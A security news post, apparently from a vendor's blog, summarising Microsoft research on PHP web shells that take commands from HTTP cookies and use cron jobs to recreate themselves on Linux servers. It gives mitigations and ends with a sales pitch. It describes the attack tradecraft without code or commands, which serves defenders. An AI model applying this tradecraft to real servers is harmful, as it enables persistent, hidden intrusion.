Microsoft security researchers have uncovered a sophisticated threat campaign targeting Linux servers, where attackers are leveraging HTTP cookies as a covert channel to control PHP web shells. This method allows malicious code to remain dormant and evade detection, activating only when specific cookie values are present. The attackers further ensure persistence by using cron jobs to periodically recreate these web shells, making them difficult to remove.

Key Takeaways

• Attackers use HTTP cookies to control PHP web shells, bypassing traditional detection methods.

• Cron jobs are employed to ensure the web shells persist even after cleanup attempts.

• This technique allows for stealthy, long-term remote code execution on Linux servers.

The Cookie-Controlled Execution Model

Instead of relying on visible URL parameters or request bodies, these advanced PHP web shells utilize HTTP cookies to receive instructions and execute commands. This approach offers significant stealth advantages, as cookie data is often less scrutinized than other parts of an HTTP request. The $_COOKIE superglobal variable in PHP makes it easy for malicious scripts to access and process these attacker-supplied values at runtime.

Microsoft identified several implementations of this technique:

• A loader using multiple layers of obfuscation and runtime checks before processing cookie input to execute a secondary payload.

• A script that segments cookie data to reconstruct essential functions, then conditionally writes and executes a payload.

• A simpler script that uses a single cookie value as a trigger for actions like input execution and file uploads.

Persistence Through Cron Jobs

A critical component of this attack is the use of cron jobs for persistence. Attackers gain initial access to Linux hosting environments through compromised credentials or exploited vulnerabilities. They then set up a cron job that periodically runs a script to recreate an obfuscated PHP loader. This "self-healing" mechanism ensures that even if security teams remove the malicious file, it will be re-established on the next scheduled execution, creating a reliable remote code execution channel.

Evasion and Stealth

The combination of cookie-based control and cron-based persistence allows attackers to significantly reduce their operational noise and minimize observable indicators in logs. The web shell remains inactive during normal traffic, only activating when specific, deliberate interactions occur. This separation of persistence (via cron) from execution control (via cookies) makes detection and remediation challenging.

Mitigation Strategies

Microsoft recommends several measures to counter this threat:

• Enforce Multi-Factor Authentication (MFA): For hosting control panels, SSH access, and administrative interfaces.

• Monitor Unusual Login Activity: Especially from unfamiliar locations.

• Restrict Shell Interpreter Execution: Limit the ability of web server processes to spawn shell interpreters like sh or bash.

• Audit Cron Jobs and Scheduled Tasks: Regularly review all scheduled tasks for suspicious entries.

• Inspect Suspicious File Creation: Monitor web directories for unusual file creations, particularly those involving decoding utilities like base64.

• Limit Control Panel Shell Capabilities: Restrict or disable shell access in hosting control panels where possible.

By shifting execution logic into cookies and leveraging legitimate system processes like cron, threat actors can achieve persistent post-compromise access that evades many traditional security controls.

By staying vigilant and adopting safe browsing practices, users can significantly reduce their exposure to these evolving threats. As cyber threats continue to evolve, your security strategy needs to evolve with them. BetterWorld Technology delivers adaptive cybersecurity solutions designed to keep your business secure while supporting innovation. Connect with us today to schedule a personalized consultation.

Sources

• Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers, The Hacker News.

• Cookie-controlled PHP webshells: A stealthy tradecraft in Linux hosting environments, Microsoft.